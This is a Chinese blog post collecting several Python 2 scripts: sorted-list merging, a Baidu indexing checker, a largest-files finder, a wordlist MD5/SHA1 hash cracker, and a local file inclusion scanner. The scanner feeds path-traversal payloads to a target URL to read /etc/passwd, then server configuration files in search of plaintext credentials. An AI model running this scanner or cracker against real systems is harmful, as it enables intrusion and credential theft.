1.有序列表的合并
#!/usr/bin/env python
# coding=utf-8
'''
假设有2个有序列表list_1、list_2,如何效率比较高的将2个list合并并保持有序状态(这里默认排序是正序)?
思路是比较简单的,无非是依次比较list_1和list_2头部第一个元素,将比较小的放在一个新的列表中,以此类推(递归),直到所有的元素都被放到新的列表中。
对于Python而言,即使是尾递归,效率也不是那么高,为了避免爆栈,通常还是会用循环的方法(loop_merge_sort)来做
'''
def recursion_merge_sort1(list_1, list_2):
tmp = []
if len(list_1) == 0:
tmp.extend(list_2)
return tmp
elif len(list_2) == 0:
tmp.extend(list_1)
return tmp
else:
if list_1[0] < list_2[0]:
tmp.append(list_1[0])
del list_1[0]
else:
tmp.append(list_2[0])
del list_2[0]
tmp += recursion_merge_sort1(list_1, list_2)
return tmp
def recursion_merge_sort2(list_1, list_2, tmp=[]):
if len(list_1) == 0 or len(list_2) == 0:
tmp.extend(list_1)
tmp.extend(list_2)
return tmp
else:
if list_1[0] < list_2[0]:
tmp.append(list_1[0])
del list_1[0]
else:
tmp.append(list_2[0])
del list_2[0]
return recursion_merge_sort2(list_1, list_2, tmp)
def loop_merge_sort(list_1, list_2):
tmp = []
while len(list_1) > 0 and len(list_2) > 0:
if list_1[0] < list_2[0]:
tmp.append(list_1[0])
del list_1[0]
else:
tmp.append(list_2[0])
del list_2[0]
tmp.extend(list_1)
tmp.extend(list_2)
return tmp
2.查询Baidu是否收录了某个URL
#!/usr/bin/env python
#coding=utf-8
import requests
from bs4 import BeautifulSoup as bs
import re
headers = {
'User-Agent': 'Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+GTB7.1;+.NET+CLR+2.0.50727)'
} # 设置UA模拟用户,还可设置多个UA提高搜索成功率
def baidu_url(word): # 构建百度搜索URL;因为是查收录,所以只显示了前10个搜索结果,还可以通过rn参数来调整搜索结果的数量
'''
get baidu search url
'''
return 'http://www.baidu.com/s?wd=%s' % word
def baidu_cont(url): # 获取百度搜索结果页内容
r = requests.get(url, headers=headers)
return r.content
def serp_links(word): #获取百度搜索结果的最终URL
'''
get baidu serp links with the word [serp - 搜索引擎结果页面(Search Engine Results Page)]
'''
b_url = baidu_url(word)
soup = bs(baidu_cont(b_url))
b_tags = soup.find_all('h3', {'class': 't'}) # 获取URL的特征值是通过class="t"
b_links = [tag.a['href'] for tag in b_tags]
real_links = []
for link in b_links: # 使用requests库获取了最终URL,而不是快照URL
try:
r = requests.get(link, headers=headers, timeout=120)
except Exception as e:
real_links.append('page404')
else:
real_links.append(r.url)
return real_links
def indexer(url): # 待查URL是否在百度搜索结果的URL列表中,如果在就表示收录,反之未收录
indexed_links = serp_links(url)
if url in indexed_links:
return True
else:
return False
3.本地暴力破解MD5/SHA1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Filename: py_crackhash.py 穷举字典破解md5/sha1
import sys, getopt, hashlib
if len(sys.argv) == 1:
print 'Usage: py_crackhash.py -t hashtype{md5/sha1} -h hashcode -w wordfile'
sys.exit()
opts, args = getopt.getopt(sys.argv[1:], "t:h:w:")
hashtype = ""
hashcode = ""
wordfile = ""
for op, value in opts:
if op == "-t":
hashtype = value
elif op == "-h":
hashcode = value
elif op == "-w":
wordfile = value
else:
sys.exit()
w = file(wordfile, 'r')
if hashtype == "md5":
while True:
line = w.readline()
if line:
y = hashlib.md5(line.rstrip()).hexdigest()
if hashcode == y:
print "md5(%s)=%s" % (line.rstrip(), y)
break
else:
print 'NULL'
break
if hashtype == "sha1":
while True:
line = w.readline()
if line:
y = hashlib.sha1(line.rstrip()).hexdigest()
if hashcode == y:
print "sha1(%s)=%s" % (line.rstrip(), y)
break
else:
print 'NULL'
break
w.close()
4.多线程查找指定目录下的最大的10个文件
#!/usr/bin/env python
# coding=utf-8
import os, os.path
from ConfigParser import RawConfigParser as rcp
from threading import Thread, Lock
import sys
import time
MaxCount=10
def insert(tenmax, filename, filesize):
i=0
while i<len(tenmax) and tenmax[i][1]>filesize:
i += 1
tenmax.insert(i, [filename, filesize])
def keepTenMax(tenmax, filename, filesize):
i=len(tenmax)
if i<MaxCount:
insert(tenmax, filename, filesize)
else:
if filesize>tenmax[i-1][1]:
insert(tenmax, filename, filesize)
tenmax.pop()
elif filesize==tenmax[i-1][1]:
tenmax.append([filename, filesize])
if len(tenmax)>MaxCount:
tenmax=tenmax[:MaxCount]
else:
return
class MyThread(Thread):#多线程搜索
def __init__(self, root, files, tname):
Thread.__init__(self)
self.root=root
self.files=files
self.name=tname
self.tenmax=[]
def run(self):
global count
for f in self.files:
filename=self.root+os.sep+f
filesize=os.stat(filename).st_size
mylock.acquire() #获得锁
count += 1
mylock.release() #释放锁
keepTenMax(self.tenmax, filename, filesize)
def allDone(threadlist):
for i in threadlist:
if i.isAlive():
return False
return True
#main
if __name__=="__main__":
global count #全局文件计数
mylock=Lock() #define a lock
count=1
tenmax=[]
threadlist=[]
if len(sys.argv)==1:
wdir='.'
elif len(sys.argv)==2:
wdir=sys.argv[1]
else:
print 'Usage: findBigFiles.py [wdir]'
sys.exit()
tname=1
begin=time.time()
for root, dirs, files in os.walk(wdir):
if files:
sthread=MyThread(root, files, tname)#对每一个目录开启一个线程搜索
threadlist.append(sthread)
sthread.start()
print 'thread-'+str(tname)+'-start search dir:'+root
tname += 1
for t in threadlist:
t.join()
if allDone(threadlist):#统计结果
for i in threadlist:
tenmax.extend(i.tenmax)
if len(tenmax)<MaxCount:
tenmax=tenmax[:len(tenmax)]
else:
a=[]
for f in tenmax:
keepTenMax(a, f[0], f[1])
tenmax=a
#打印并输出到parser文件-当前目录下的result.ini文件
print
print '[=========================threads count', len(threadlist), '====================]'
print '[=========================try', count, 'files=======================]'
print '[=========================the ', MaxCount, ' thMax files list===========]'
print
c=1
myrcp=rcp()
myrcp.add_section('Result')
for fname, fsize in tenmax:
size='%.3fMB' % (fsize/1024.0/1024.0)
print '[%d]%s-%s' % (c, fname, size)
myrcp.set('Result', '[%d]%s' % (c, fname), size)
c += 1
myrcp.write(open('result.txt', 'w'))
end=time.time()
usetime=end-begin
print
print '[=============================================================]'
print 'all time:%.3fs' % usetime
5.探测本地文件包含漏洞
#!/usr/bin/env python
#-*-coding:utf-8-*-
import urllib2
import sys
var1=0
var2=0
print ("-----------------------------------------------------")
print ("| usage:py_detect_LFI.py site url |")
print ("|this url like http://www.google.com/index.php?id= |")
print (" writed by eip_0x[Freebuf],just 4 fun |")
print ("-----------------------------------------------------")
site0=sys.argv[1]+'/kfdsjkf7675637d.txt' #访问一个不存在的文件获取返回错误页面的length信息
req0=urllib2.Request(site0)
conn0=urllib2.urlopen(req0)
while 1:
data0=conn0.read(4072) #错误页面的内容
if not len(data0):
break
paths1=['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd']
paths2=['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf']
for path in paths1: #首先查找'/etc/passwd'文件是否存在
site=sys.argv[1]+path
req=urllib2.Request(site)
conn=urllib2.urlopen(req)
while 1:
data=conn.read(4072)
if not len(data0):
break
if len(data)!=len(data0):
print path," this file has been found!!!!u r lucky and have fun!!!!"
for path2 in paths2: #在查找到了'/etc/passwd'文件之后再查找配置文件,希望能从中读取出用户名密码的明文信息
path2ok=path.replace("/etc/passwd",path2) #replace("查找的内容","替换后的内容"[,次数]),替换次数可以为空,即表示替换所有
site2=sys.argv[1]+path2ok
req2=urllib2.Request(site2)
conn2=urllib2.urlopen(req2)
while 1:
data2=conn2.read(4072)
if not len(data2):
break
if len(data2)!=len(data0):
print path2,"this file has been found!!"
6.待续……
==
这里的很多代码都是在网上逛blog的时候收集而来,在此感谢作者的无私分享(有些代码已经忘了出处了,找到了之后会尽快补上)。
《“一些实用的Python脚本[bak]”》 有 1 条评论
归并排序
http://zjwyhll.blog.163.com/blog/static/75149781201281291048145